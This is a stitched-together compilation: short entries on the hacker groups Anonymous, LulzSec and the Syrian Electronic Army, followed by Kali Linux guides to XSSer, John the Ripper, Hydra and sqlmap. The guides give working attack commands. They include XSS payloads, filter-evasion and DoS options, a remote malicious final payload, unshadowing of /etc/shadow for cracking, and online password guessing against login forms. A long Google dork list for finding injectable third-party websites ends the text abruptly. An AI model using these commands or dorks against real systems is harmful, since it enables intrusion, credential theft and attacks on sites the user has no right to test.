Anonymous

Anonymous (used as a mass noun) is a loosely associated international network of activist and hacktivist entities. A website nominally associated with the group describes it as "an internet gathering" with "a very loose and decentralized command structure that operates on ideas rather than directives". The group became known for a series of well-publicized publicity stunts and distributed denial-of-service (DDoS) attacks on government, religious, and corporate websites.

Anonymous originated in 2003 on the imageboard 4chan, representing the concept of many online and offline community users simultaneously existing as an anarchic, digitized global brain.Anonymous members (known as "Anons") can be distinguished in public by the wearing of stylised Guy Fawkes masks.

In its early form, the concept was adopted by a decentralized online community acting anonymously in a coordinated manner, usually toward a loosely self-agreed goal, and primarily focused on entertainment, or "lulz". Beginning with 2008's Project Chanology—a series of protests, pranks, and hacks targeting the Church of Scientology—the Anonymous collective became increasingly associated with collaborative hacktivism on a number of issues internationally. Individuals claiming to align themselves with Anonymous undertook protests and other actions (including direct action) in retaliation against anti-digital piracycampaigns by motion picture and recording industry trade associations. Later targets of Anonymous hacktivism included government agencies of the US, Israel, Tunisia, Uganda, and others; child pornography sites; copyright protection agencies; the Westboro Baptist Church; and corporations such as PayPal, MasterCard, Visa, and Sony. Anons have publicly supported WikiLeaks and the Occupy movement. Related groups LulzSec and Operation AntiSec carried out cyberattacks on US government agencies, media, video game companies, military contractors, military personnel, and police officers, resulting in the attention of law enforcement to the groups' activities. It has been described as being anti-Zionist, and has threatened to erase Israel from the Internet  and engaged in the "#OpIsrael" cyber-attacks of Israeli websites on Yom HaShoah (Holocaust Remembrance Day) in 2013.

Dozens of people have been arrested for involvement in Anonymous cyberattacks, in countries including the US, UK, Australia, the Netherlands, Spain, and Turkey. Evaluations of the group's actions and effectiveness vary widely. Supporters have called the group "freedom fighters" and digital Robin Hoods while critics have described them as "a cyber lynch-mob"or "cyber terrorists".^[In 2012, Time called Anonymous one of the "100 most influential people" in the world.

LulzSec

Lulz Security, commonly abbreviated as LulzSec, was a black hat computer hackergroup that claimed responsibility for several high profile attacks, including the compromise of user accounts from Sony Pictures in 2011. The group also claimed responsibility for taking the CIA website offline. Some security professionals have commented that LulzSec has drawn attention to insecure systems and the dangers of password reuse. It has gained attention due to its high profile targets and the sarcastic messages it has posted in the aftermath of its attacks. One of the founders of LulzSec was a computer security specialist who used the online moniker Sabu. The man accused of being Sabu has helped law enforcement track down other members of the organization as part of a plea deal. At least four associates of LulzSec were arrested in March 2012 as part of this investigation. British authorities had previously announced the arrests of two teenagers they allege are LulzSec members T-flow and Topiary.

At just after midnight (BST, UT+01) on 26 June 2011, LulzSec released a "50 days of lulz" statement, which they claimed to be their final release, confirming that LulzSec consisted of six members, and that their website is to be shut down.^[1] This breaking up of the group was unexpected.^[4] The release included accounts and passwords from many different sources. Despite claims of retirement, the group committed another hack against newspapers owned by News Corporation on 18 July, defacing them with false reports regarding the death of Rupert Murdoch. The group helped launch Operation AntiSec, a joint effort involving LulzSec, Anonymous, and other hackers.

Syrian Electronic Army

The Syrian Electronic Army (SEA), is a group of computer hackers supervised by the Syrian Assad regime. Using spamming, defacement, malware (including the Blackwormtool), phishing, and denial of service attacks, it mainly targets political opposition groups and western websites including news organizations and human rights groups. The Syrian Electronic Army claims to be "a group of enthusiastic Syrian youths who could not stay passive towards the massive distortion of facts about the recent uprising in Syria", however the SEA is believed by experts to be "a state-supervised operation"^[ that is linked to the Assad regime.The SEA is thought to be the first public, virtual army in the Arab worldto openly launch cyber attacks on its opponents.

Activities

The SEA's tone and style vary widely from the serious and openly political to ironic statements intended as often critical or pointed humor: SEA had "Exclusive: Terror is striking the #USA and #Obama is Shamelessly in Bed with Al-Qaeda" tweeted from the Twitter account of 60 Minutes, and in July 2012 posted "Do you think Saudi and Qatar should keep funding armed gangs in Syria in order to topple the regime? #Syria," from Al Jazeera's Twitter account before the message was removed. In another attack, members of SEA used the BBC Weather Channel Twitter account to post the headline, "Saudi weather station down due to head on-collision with camel." One commentator notes that "[SEA] volunteers might include Syrian diaspora; some of their hacks have used colloquial English and redditmemes. After Washington Post reporter Max Fisher called their jokes unfunny, one hacker associated with the group told a Vice interview 'haters gonna hate.'"

Kali Linux : XSSER

Installation

XSSer runs on many platforms. It requires Python and the following libraries:

- python-pycurl - Python bindings to libcurl
- python-beautifulsoup - error-tolerant HTML parser for Python
- python-libxml2 - Python bindings for the GNOME XML library
- python-geoip - Python bindings for the GeoIP IP-to-country resolver library

On Debian-based systems (ex: Ubuntu), run:

sudo apt-get install python-pycurl python-beautifulsoup python-libxml2 python-geoip

Usage

xsser [OPTIONS] [-u |-i |-d ] [-g |-p |-c ] [Request(s)] [Vector(s)] [Bypasser(s)] [Technique(s)] [Final Injection(s)]

Options:

--version	show program's version number and exit
-h, --help	show this help message and exit
-s, --statistics	show advanced statistics output results
-v, --verbose	active verbose mode output results
--gtk	launch XSSer GTK Interface (Wizard included!)

*Special Features*:
You can choose Vector(s) and Bypasser(s) to inject code with this extra special features:

--imx=IMX	create a false image with XSS code embedded
--fla=FLASH	create a false .swf file with XSS code embedded

*Select Target(s)*:
At least one of these options has to be specified to set the source to get target(s) urls from.
You need to choose to run XSSer:

-u URL, --url=URL	Enter target(s) to audit
-i READFILE	Read target URLs from a file
-d DORK	Process search engine dork results as target urls
--De=DORK_ENGINE	Search engine to use for dorking (bing, altavista, yahoo, baidu, yandex, youdao, webcrawler, google, etc. See dork.py file to check for available engines)

*Select type of HTTP/HTTPS Connection(s)*:
These options can be used to specify which parameter(s) we want to use like payload to inject code.

-g GETDATA	Enter payload to audit using GET. (ex: '/menu.php?q=')
-p POSTDATA	Enter payload to audit using POST. (ex: 'foo=1&bar=')
-c CRAWLING	Number of urls to crawl on target(s): 1-99999
--Cw=CRAWLING_WIDTH	Deeping level of crawler: 1-5
--Cl	Crawl only local target(s) urls (default TRUE)

*Configure Request(s)*:
These options can be used to specify how to connect to target(s) payload(s).
You can choose multiple:

--cookie=COOKIE	Change your HTTP Cookie header
--drop-cookie	Ignore Set-Cookie header from response
--user-agent=AGENT	Change your HTTP User-Agent header (default SPOOFED)
--referer=REFERER	Use another HTTP Referer header (default NONE)
--xforw	Set your HTTP X-Forwarded-For with random IP values
--xclient	Set your HTTP X-Client-IP with random IP values
--headers=HEADERS	Extra HTTP headers newline separated
--auth-type=ATYPE	HTTP Authentication type (Basic, Digest, GSS or NTLM)
--auth-cred=ACRED	HTTP Authentication credentials (name:password)
--proxy=PROXY	Use proxy server (tor: http://localhost:8118)
--ignore-proxy	Ignore system default HTTP proxy
--timeout=TIMEOUT	Select your timeout (default 30)
--retries=RETRIES	Retries when the connection timeouts (default 1)
--threads=THREADS	Maximum number of concurrent HTTP requests (default 5)
--delay=DELAY	Delay in seconds between each HTTP request (default 0)
--tcp-nodelay	Use the TCP_NODELAY option
--follow-redirects	XSSer will follow server redirection responses (302)
--follow-limit=FLI	Set how many times XSSer will follow redirections (default 50)

*Checker Systems*:
This options are usefull to know if your target(s) have some filters against XSS attacks,
to reduce 'false positive' results and to perform more advanced tests:

--no-head	NOT verify the stability of the url (codes: 200|302) with a HEAD pre-check request
--alive=ISALIVE	set limit of every how much errors XSSer must to verify that target is alive
--hash	send an unique hash, without vectors, to pre-check if target(s) repeats all content recieved
--heuristic	launch a heuristic testing to discover which parameters are filtered on target(s) code: ;\/<>"'=
--checkaturl=ALT	check for a valid XSS response from target(s) at an alternative url. 'blind XSS'
--checkmethod=ALTM	check responses from target(s) using a different connection type: GET or POST (default: GET)
--checkatdata=ALD	check responses from target(s) using an alternative payload (default: same than first injection)
--reverse-check	establish a reverse connection from target(s) to XSSer to certificate that is 100% vulnerable

*Select Vector(s)*:
These options can be used to specify a XSS vector source code to inject in each payload.
Important, if you don't want to try to inject a common XSS vector, used by default.
Choose only one option:

--payload=SCRIPT	OWN - Insert your XSS construction -manually-
--auto	AUTO - Insert XSSer 'reported' vectors from file (HTML5 vectors included!)

*Select Bypasser(s)*:
These options can be used to encode selected vector(s) to try to bypass all possible anti-XSS filters
on target(s) code and some IPS rules, if the target use it. Also, can be combined with other techniques to provide encoding:

--Str	Use method String.FromCharCode()
--Une	Use function Unescape()
--Mix	Mix String.FromCharCode() and Unescape()
--Dec	Use Decimal encoding
--Hex	Use Hexadecimal encoding
--Hes	Use Hexadecimal encoding, with semicolons
--Dwo	Encode vectors IP addresses in DWORD
--Doo	Encode vectors IP addresses in Octal
--Cem	Try -manually- different Character Encoding mutations (reverse obfuscation: good) -> (ex:'Mix,Une,Str,Hex')

*Special Technique(s)*:
These options can be used to try to inject code using different type of XSS techniques. You can choose multiple:

--Coo	COO - Cross Site Scripting Cookie injection
--Xsa	XSA - Cross Site Agent Scripting
--Xsr	XSR - Cross Site Referer Scripting
--Dcp	DCP - Data Control Protocol injections
--Dom	DOM - Use Anchor Stealth (DOM shadows!)
--Ind	IND - HTTP Response Splitting Induced code
--Anchor	ANC - Use Anchor Stealth payloader (DOM shadows!)
--Phpids	PHP - Exploit PHPIDS bug (0.6.5) to bypass filters

*Select Final injection(s)*:
These options can be used to specify the final code to inject in vulnerable target(s). Important, if you want to exploit
on-the-wild your discovered vulnerabilities. Choose only one option:

--Fp=FINALPAYLOAD	OWN - Insert your final code to inject -manually-
--Fr=FINALREMOTE	REMOTE - Insert your final code to inject -remotelly-
--Doss	DOSs - XSS Denial of service (server) injection
--Dos	DOS - XSS Denial of service (client) injection
--B64	B64 - Base64 code encoding in META tag (rfc2397)

*Special Final injection(s)*:
These options can be used to execute some 'special' injection(s) in vulnerable target(s). 
You can select multiple and combine with your final code (except with DCP code):

--Onm	ONM - Use onMouseMove() event to inject code
--Ifr	IFR - Use "iframe" source tag to inject code

*Miscellaneous*:

--silent	inhibit console output results
--update	check for XSSer latest stable version
--save	output all results directly to template (XSSlist.dat)
--xml=FILEXML	output 'positives' to aXML file (--xml filename.xml)
--short=SHORTURLS	display -final code- shortered (tinyurl, is.gd)
--launch	launch a browser at the end with each XSS discovered
--tweet	publish each XSS discovered into the 'Grey Swarm!'
--tweet-tags=TT	add more tags to your XSS discovered publications (default: #xss) - (ex: #xsser #vulnerability)

Examples

If you have interesting examples of usage about XSSer, please send an email to the mailing list.

-------------------

* Simple injection from URL:

$ python xsser.py -u "http://host.com"
-------------------
* Simple injection from File, with tor proxy and spoofing HTTP Referer headers:

$ python xsser.py -i "file.txt" --proxy "http://127.0.0.1:8118" --referer "666.666.666.666"
-------------------
* Multiple injections from URL, with automatic payloading, using tor proxy, injecting on payloads character encoding in "Hexadecimal", with verbose output and saving results to file (XSSlist.dat):

$ python xsser.py -u "http://host.com" --proxy "http://127.0.0.1:8118" --auto --Hex --verbose -w
-------------------
* Multiple injections from URL, with automatic payloading, using caracter encoding mutations (first, change payload to hexadecimal; second, change to StringFromCharCode the first encoding; third, reencode to Hexadecimal the second encoding), with HTTP User-Agent spoofed, changing timeout to "20" and using multithreads (5 threads):

$ python xsser.py -u "http://host.com" --auto --Cem "Hex,Str,Hex" --user-agent "XSSer!!" --timeout "20" --threads "5"
-------------------
* Advance injection from File, payloading your -own- payload and using Unescape() character encoding to bypass filters:

$ python xsser.py -i "urls.txt" --payload 'a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval(a+b+c+d);' --Une
-------------------
* Injection from Dork selecting "duck" engine (XSSer Storm!):

$ python xsser.py --De "duck" -d "search.php?"
-------------------
* Injection from Crawler with deep 3 and 4 pages to see (XSSer Spider!):

$ python xsser.py -c3 --Cw=4 -u "http://host.com"
-------------------
* Simple injection from URL, using POST, with statistics results:

$ python xsser.py -u "http://host.com" -p "index.php?target=search&subtarget=top&searchstring=" -s
-------------------
* Multiple injections from URL to a parameter sending with GET, using automatic payloading, with IP Octal payloading ofuscation and printering results in a "tinyurl" shortered link (ready for share!):

$ python xsser.py -u "http://host.com" -g "bs/?q=" --auto --Doo --short tinyurl 
-------------------
* Simple injection from URL, using GET, injecting a vector in Cookie parameter, trying to use a DOM shadow space (no server logging!) and if exists any "hole", applying your manual final payload "malicious" code (ready for real attacks!):

$ python xsser.py -u "http://host.com" -g "bs/?q=" --Coo --Dom --Fr="!enter your final injection code here!"
-------------------
* Simple injection from URL, using GET and trying to generate with results a "malicious" shortered link (is.gd) with a valid DoS (Denegation Of Service) browser client payload:

$ python xsser.py -u "http://host.com" -g "bs/?q=" --Dos --short "is.gd"
-------------------
* Multiple injections to multiple places, extracting targets from a list in a FILE, applying automatic payloading, changing timeout to "20" and using multithreads (5 threads), increasing delay between petitions to 10 seconds, injecting parameters in HTTP USer-Agent, HTTP Referer and in Cookie parameters, using proxy Tor, with IP Octal ofuscation, with statistics results, in verbose mode and creating shortered links (tinyurl) of any valid injecting payloads found. (real playing mode!):

$ python xsser.py -i "list_of_url_targets.txt" --auto --timeout "20" --threads "5" --delay "10" --Xsa --Xsr --Coo --proxy "http://127.0.0.1:8118" --Doo -s --verbose --Dos --short "tinyurl"
-------------------
* Injection of user XSS vector directly in a malicious -fake- image created "on the wild", and ready to be uploaded.

$ python xsser.py --Imx "test.png" --payload "!enter your malicious injection code here!" 
-------------------
* Report output 'positives' injections of a dorking search (using "ask" dorker) directly to a XML file.

$ python xsser.py -d "login.php" --De "ask" --xml "security_report_XSSer_Dork_cuil.xml" 
-------------------
* Publish output 'positives' injections of a dorking search (using "duck" dorker) directly to http://identi.ca
(federated XSS pentesting botnet)

$ python xsser.py -d "login.php" --De "duck" --tweet

* Examples online:

- http://identi.ca/xsserbot01
- http://twitter.com/xsserbot01
-------------------
* Create a .swf movie with XSS code injected

$ python xsser.py --fla "name_of_file"
-------------------
* Send a pre-checking hash to see if target will generate -false positive- results

$ python xsser.py -u "host.com" --hash
-------------------
* Multiple fuzzing injections from url, including DCP injections and exploiting our "own" code, spoofed in a shortered link, on positive results founded. XSS real-time exploiting.

$ python xsser.py -u "host.com" --auto --Dcp --Fp "enter_your_code_here" --short "is.gd"
-------------------
* Exploiting Base64 code encoding in META tag (rfc2397) in a manual payload of a vulnerable target.

$ python xsser.py -u "host.com" -g "vulnerable_path" --payload "valid_vector_injected" --B64
-------------------
* Exploiting our "own" -remote code- in a payload discovered using fuzzing and launch it in a browser directly

$ python xsser.py -u "host.com" -g "vulnerable_path" --auto --Fr "my_host/path/code.js" --launch

Kali Linux : Sources.list And Manual Update

We’ve seen many people break their Kali Linux installations by following unofficial advice, or arbitrarily populating their sources.list file with unneeded repositories. The following post aims to clarify what repositories should exist in sources.list, and when they should be used.

Any additional repositories added to the Kali sources.list file will most likely BREAK YOUR KALI LINUX INSTALL.

NOTE : AFTER EDITING YOUR SOURCES LIST DO : 

apt-get update && apt-get upgrade && apt-get dist-upgrade

Regular repositories

On a standard, clean install of Kali Linux, you should have the following two entries present in /etc/apt/sources.list:

deb http://http.kali.org/kali kali main non-free contrib
deb http://security.kali.org/kali-security kali/updates main contrib non-free

You can find a list of official Kali Linux mirrors here.

Source repositories

In case you require source packages, you might also want to add the following repositories as well:

deb-src http://http.kali.org/kali kali main non-free contrib
deb-src http://security.kali.org/kali-security kali/updates main contrib non-free

Bleeding Edge repositories

If you have a need for bleeding edge repositories, you can add the following entry. Do not add this repo “for the heck of it” – it’s called “bleeding edge” for a reason. Packages in this repository are NOT manually maintained (they are auto-generated), and are low priority in general.

deb http://repo.kali.org/kali kali-bleeding-edge main
#deb-src http://repo.kali.org/kali kali-bleeding-edge main

Kali Linux : John The Ripper

Password cracking with John the Ripper on Linux

For those of you who haven't yet heard about John the Ripper (hereby called John for brevity), it is a free password cracking tool written mostly in C. Before going any further, we must tell you that although we trust our readers, we do not encourage or condone any malicious activities that may be performed using this tool or any other tools we talked about in the past. Security-related tools are often like a double-edged sword, in that they can be used for good but also for bad things. So although it might sound tempting, we recommend you to refrain from any damaging activities, if for nothing else, just because you have great chances to land in a jail cell. 1. Introduction

This article will deal with John from a system administrator's perspective, so we expect you to have intermediate knowledge about your Linux system, whatever distribution that may be, and that you are a security-conscious person with basic security knowledge. However, this article might appeal to you also if you are a home user wanting to learn about these kind of things, but be warned: some of the commands presented below will ask a great deal of your CPU time, so maybe it would be better if you had a test machine and/or lots of time and patience, because password cracking attempts may take days, even on a relatively new machine. As usual please refer to our new Linux Forum for additional help or information.

2. Installing John

Although, at least on the distributions we tried, the package in named simply "john" with Gentoo making an exception and naming it "johntheripper", we will make it easy for you and show you how to install it on several known distributions.

2.1. Debian

Debian differs from other distributions that offer John in their repositories because it offers a nice manual page, although upstream doesn't have one. To install, simply type

 # aptitude install john 

2.2. Fedora

On Fedora, it's also as simple as doing

 # yum install john 

2.3. Arch Linux

 # pacman -S john 

2.4. OpenSuse Linux

# zypper install john

2.5. Gentoo

As we said, Gentoo's package is named differently from what others offer, so here you will have to run

 # emerge johntheripper

2.6. Slackware

Although there doesn't seem to be a john package in the official repositories, there is a slackbuild that gets John installed on your system (this was tested on Slackware 13.37).

Although we gave you just a few examples on how you can get John on your Linux system, many of the examples presented will run if you have other OS installed: besides source code, the project offers the program for BeOS, Microsoft Windows, Solaris or MacOS X. But for our article, as the title says, we tested the examples on Linux.

3. Using John the Ripper

You need not worry about cryptic configuration files, as John is ready to use with the appropriate command-line flags with no other effort on your part. One word of warning, though: as you already noticed, we tell our readers when they should use root privileges and when they shouldn't. Except when noted, you are strongly recommended to use your normal everyday user (or another, if you prefer, but it shouldn't have super user rights). On my Debian system, John is available as /usr/sbin/john, so if you don't find it we recommend you use whereis and type the whole path when running john unprivileged (or you can simply create an alias).

The simplest way to get your feet wet is to type

 $ /usr/sbin/john --test 

for doing some tests and benchmarks on John's capabilities. If you have no idea what Kerberos, MD5, DES or Blowfish are, we recommend you start reading some basic security books, because, like we said before, you need some security/administration background. Now, let's create a text file in password format (<user>:<hash>) with a valid hash, of course, and get John to work. You can simply copy a user from /etc/shadow, but we recommend something simpler, because we presume you want to see the results as fast as you can. So create a file named password.txt somewhere inside your /home and put this in it:

myuser:AZl.zWwxIh15Q

Save the file, then simply feed it to John with no arguments (for now):

 $ /usr/sbin/john password.txt 

We must repeat our warning: password cracking is a CPU-intensive and long process, so depending on your system, that might take quite a while. However, this also depends on what you want to achieve, because if your powerful CPU has been crunching at the password(s) for days with no outcome, it's only safe to say that it's a good password. But if the password is really critical, leave the system until John finishes its' work to make sure everything is alright. Like we said before, this could take many days.

Now, if you have a powerful box with the sole purpose of testing passwords, which is always a good thing given the means, you can try your real-life passwords with John. One way is to use /etc/shadow directly, but we recommend you take a somewhat different course. Note that this applies to systems using shadow passwords, and all the modern Linux distributions do. John offers a nifty utility called unshadow, which we will use to create a file from our passwd and shadow files:

 # unshadow /etc/passwd /etc/shadow > mypasswd.txt 

Now make sure that mypasswd.txt is available to your normal user and do

 $ /usr/sbin/john mypasswd.txt 

John will try single crack mode first, then wordlist mode, then incremental. In John's terms, a mode is a method it uses to crack passwords. As you know, there are many kinds of attacks: dictionary attacks, brute force attacks, and so on. Well, this is roughly what John's modes are. As some of you might have realized, wordlist mode is basically a dictionary attack. Besides these three modes enumerated above, John also supports another one called external mode. You can select what mode to use with, for example, --single, --external and so on. We recommend you check out the documentation over at openwall.com for a good but brief description of every mode. But of course we will tell you, in short, what every mode does.

John the Ripper's documentation recommends starting with single crack mode, mostly because it's faster and even faster if you use multiple password files at a time. Incremental mode is the most powerful mode available, as it will try various combinations when cracking, and you can choose what kind of mode (mode applied to the incremental option) to use, including your own. External mode, as the name implies, will use custom functions that you write yourself, while wordlist mode takes a word list specified as an argument to the option (it can be a file with a list of words written one per line, or stdin) and tries a simple dictionary attack on passwords.

If John is succesful in cracking one of the passwords, it will write to ~/.john/john.pot. However, that file isn't human-readable, so you can read cracked passwords with

 $ /usr/sbin/john --show mypasswd.txt

To check if the root password got cracked, filter by UID:

 $ /usr/sbin/john --show --users=0 mypasswd.txt

Of course, John knows about wildcards and multiple files:

 $ /usr/sbin/john --show --users=0 *passwd*

Just as you can filter by user, you can also filter by group, by using the --groups flag, and that filtering is available also when cracking. Going further to wordlist mode, here's how you can use it with the built-in mangling rules enabled:

 $ /usr/sbin/john --wordlist=passwd.lst --rules passwd.txt

John also allows you to create multiple named sessions, which is practical, because since John can take lots of time to complete a task, you can later view all sessions running to decide which one to kill. The option for named sessions is --session=taskname and you can use --status or --status=taskname to see all or certain sessions. But there's more: you can restore sessions or particular ones by name using --restore or --restore=taskname. A few examples:

 $ /usr/sbin/john --session=allrules --wordlist=all.lst --rules mypasswd.txt
 $ /usr/sbin/john --status=allrules
 $ ps aux | grep john #get the PID of the john session you want to kill
 $ kill HUP $PID_of_john_session_to_kill
 $ /usr/sbin/john --restore=allrules

Here's some examples of using incremental mode with John:

 $ /usr/sbin/john --incremental mypasswd.txt
 $ /usr/sbin/john --incremental=alpha mypasswd.txt

Of course, this isn't a replacement of John's documentation. Although, as we said, it doesn't offer a manual page, you will find lots of documentation on its' page, as well as a useful wiki. For example, you will notice that even if you're running John on a multiprocessor machine, it will use only one core, usually the first. You can address this problem by reading the documentation and following the instructions there.

Kali Linux : Hydra

There is tool that is excellent for cracking online passwords and it is calledTHC-Hydra. Fortunately, it is built into our Kali distribution, so we don't need to download, install, or compile anything to use it.

Image via Shutterstock

Step 1: Download & Install Tamper Data

Before we start with THC-Hydra, let's install another tool that complements THC-Hydra. This tool is known as "Tamper Data", and it is a plug-in for Mozilla's Firefox. Since our IceWeasel browser in Kali is built on the open source Firefox, it plugs equally well into Iceweasel.

Tamper Data enables us to capture and see the HTTP and HTTPS GET and POST information. In essense, Tamper Data is a web proxy similar to Burp Suite, but simpler and built right into our browser.

Tamper Data enables us to grab the information from the browser en route to the server and modify it. In addition, once we get into more sophisticated web attacks, it is crucial to know what fields and methods are being used by the web form, and Tamper Data can help us with that as well.

Let's download it from here and install it into Iceweasel.

Install the Tamper Data Firefox add-on in Iceweasel.

Step 2: Test Tamper Data

Now that we have Tamper Data installed into our browser, let's see what it can do. Activate Tamper Data and then navigate to any website. Below you can see that I have navigated to Bank of America and Tamper Data provides we with each HTTPS GET and POST request between my browser and the server.

HTTPS GET and POST requests for BOA.

When I try to login to the site with the username "hacker", Tamper Data returns to me all the critical info on the form. This information will be useful when we begin to use Hydra to crack online passwords.

Tamper Data information for BOA login.

Step 3: Open THC Hydra

Now that we have Tamper Data in place and working properly, let's open Hydra. You can find it at Kali Linux -> Password -> Online Attacks -> Hydra. You can see it about midway among the list of online password cracking tools.

Select the "hydra" tool.

Step 4: Understand the Hydra Basics

When we open Hydra, we are greeted with this help screen. Note the sample syntax at the bottom of the screen. Hydra's syntax is relatively simple and similar to other password cracking tools.

The initial help screen for Hydra.

Let's take a look at it further.

hydra -l username -p passwordlist.txt target

The username can be a single user name, such as "admin" or username list,passwordlist is usually any text file that contains potential passwords, andtarget can be an IP address and port, or it can be a specific web form field.

Although you can use ANY password text file in Hydra, Kali has several built in. Let's change directories to /usr/share/wordlists:

kali > cd /usr/share/wordlists

Then list the contents of that directory:

kali > ls

You can see below, Kali has many word lists built in. You can use any of these or any word list you download from the web as long as it was created in Linux and is in the .txt format.

The default word lists available in Kali.

Step 5: Use Hydra to Crack Passwords

In the example below, I am using Hydra to try to crack the "admin" password using the "rockyou.txt" wordlist at 192.168.89.190 on port 80.

An example of using Hydra.

Using Hydra on Web Forms

Using Hydra on web forms adds a level of complexity, but the format is similar except that you need info on the web form parameters that Tamper Data can provide us.

The syntax for using Hydra with a web form is to use <url>:<formparameters>:<failure string> where previously we had used the target IP. We still need a username list and password list.

Probably the most critical of these parameters for web form password hacking is the "failure string". This is the string that the form returns when the username or password is incorrect. We need to capture this and provide it to Hydra so that Hydra knows when the attempted password is incorrect and can then go to the next attempt.

Kali Linux : Sqlmap

Use SQLMAP SQL Injection to hack a website and database in Kali Linux 7

This was written by Cyb3R Shzz0R

---

SQL injection is a code injection technique, used to attack data driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL injection must exploit a security vulnerability in an application’s software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL databases. In this guide I will show you how to SQLMAP SQL Injection on Kali Linux to hack a website (more specifically Database) and extract usernames and passwords on Kali Linux.

What is SQLMAP

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Features

1. Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
2. Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band.
3. Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
4. Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
5. Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
6. Support to dump database tables entirely, a range of entries or specific columns as per user’s choice. The user can also choose to dump only a range of characters from each column’s entry.
7. Support to search for specific database names, specific tables across all databases or specific columns across all databases’ tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns’ names contain string like name and pass.
8. Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
9. Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
10. Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user’s choice.
11. Support for database process’ user privilege escalation via Metasploit’s Meterpreter getsystem command.

[Source: www.sqlmap.org]

Be considerate to the user who spends time and effort to put up a website and possibly depends on it to make his days end. Your actions might impact someone is a way you never wished for. I think I can’t make it anymore clearer. 

Step 1: Find a Vulnerable Website

This is usually the toughest bit and takes longer than any other steps. Those who know how to use Google Dorks knows this already, but in case you don’t I have put together a number of strings that you can search in Google. Just copy paste any of the lines in Google and Google will show you a number of search results.

Step 1.a: Google Dorks strings to find Vulnerable SQLMAP SQL injectable website

This list a really long.. Took me a long time to collect them. If you know SQL, then you can add more here.. Put them in comment section and I will add them here.

Google Dork string Column 1	Google Dork string Column 2	Google Dork string Column 3
inurl:item_id=	inurl:review.php?id=	inurl:hosting_info.php?id=
inurl:newsid=	inurl:iniziativa.php?in=	inurl:gallery.php?id=
inurl:trainers.php?id=	inurl:curriculum.php?id=	inurl:rub.php?idr=
inurl:news-full.php?id=	inurl:labels.php?id=	inurl:view_faq.php?id=
inurl:news_display.php?getid=	inurl:story.php?id=	inurl:artikelinfo.php?id=
inurl:index2.php?option=	inurl:look.php?ID=	inurl:detail.php?ID=
inurl:readnews.php?id=	inurl:newsone.php?id=	inurl:index.php?=
inurl:top10.php?cat=	inurl:aboutbook.php?id=	inurl:profile_view.php?id=
inurl:newsone.php?id=	inurl:material.php?id=	inurl:category.php?id=
inurl:event.php?id=	inurl:opinions.php?id=	inurl:publications.php?id=
inurl:product-item.php?id=	inurl:announce.php?id=	inurl:fellows.php?id=
inurl:sql.php?id=	inurl:rub.php?idr=	inurl:downloads_info.php?id=
inurl:index.php?catid=	inurl:galeri_info.php?l=	inurl:prod_info.php?id=
inurl:news.php?catid=	inurl:tekst.php?idt=	inurl:shop.php?do=part&id=
inurl:index.php?id=	inurl:newscat.php?id=	inurl:productinfo.php?id=
inurl:news.php?id=	inurl:newsticker_info.php?idn=	inurl:collectionitem.php?id=
inurl:index.php?id=	inurl:rubrika.php?idr=	inurl:band_info.php?id=
inurl:trainers.php?id=	inurl:rubp.php?idr=	inurl:product.php?id=
inurl:buy.php?category=	inurl:offer.php?idf=	inurl:releases.php?id=
inurl:article.php?ID=	inurl:art.php?idm=	inurl:ray.php?id=
inurl:play_old.php?id=	inurl:title.php?id=	inurl:produit.php?id=
inurl:declaration_more.php?decl_id=	inurl:news_view.php?id=	inurl:pop.php?id=
inurl:pageid=	inurl:select_biblio.php?id=	inurl:shopping.php?id=
inurl:games.php?id=	inurl:humor.php?id=	inurl:productdetail.php?id=
inurl:page.php?file=	inurl:aboutbook.php?id=	inurl:post.php?id=
inurl:newsDetail.php?id=	inurl:ogl_inet.php?ogl_id=	inurl:viewshowdetail.php?id=
inurl:gallery.php?id=	inurl:fiche_spectacle.php?id=	inurl:clubpage.php?id=
inurl:article.php?id=	inurl:communique_detail.php?id=	inurl:memberInfo.php?id=
inurl:show.php?id=	inurl:sem.php3?id=	inurl:section.php?id=
inurl:staff_id=	inurl:kategorie.php4?id=	inurl:theme.php?id=
inurl:newsitem.php?num=	inurl:news.php?id=	inurl:page.php?id=
inurl:readnews.php?id=	inurl:index.php?id=	inurl:shredder-categories.php?id=
inurl:top10.php?cat=	inurl:faq2.php?id=	inurl:tradeCategory.php?id=
inurl:historialeer.php?num=	inurl:show_an.php?id=	inurl:product_ranges_view.php?ID=
inurl:reagir.php?num=	inurl:preview.php?id=	inurl:shop_category.php?id=
inurl:Stray-Questions-View.php?num=	inurl:loadpsb.php?id=	inurl:transcript.php?id=
inurl:forum_bds.php?num=	inurl:opinions.php?id=	inurl:channel_id=
inurl:game.php?id=	inurl:spr.php?id=	inurl:aboutbook.php?id=
inurl:view_product.php?id=	inurl:pages.php?id=	inurl:preview.php?id=
inurl:newsone.php?id=	inurl:announce.php?id=	inurl:loadpsb.php?id=
inurl:sw_comment.php?id=	inurl:clanek.php4?id=	inurl:pages.php?id=
inurl:news.php?id=	inurl:participant.php?id=
inurl:avd_start.php?avd=	inurl:download.php?id=
inurl:event.php?id=	inurl:main.php?id=
inurl:product-item.php?id=	inurl:review.php?id=
inurl:sql.php?id=	inurl:chappies.php?id=
inurl:material.php?id=	inurl:read.php?id=
inurl:clanek.php4?id=	inurl:prod_detail.php?id=
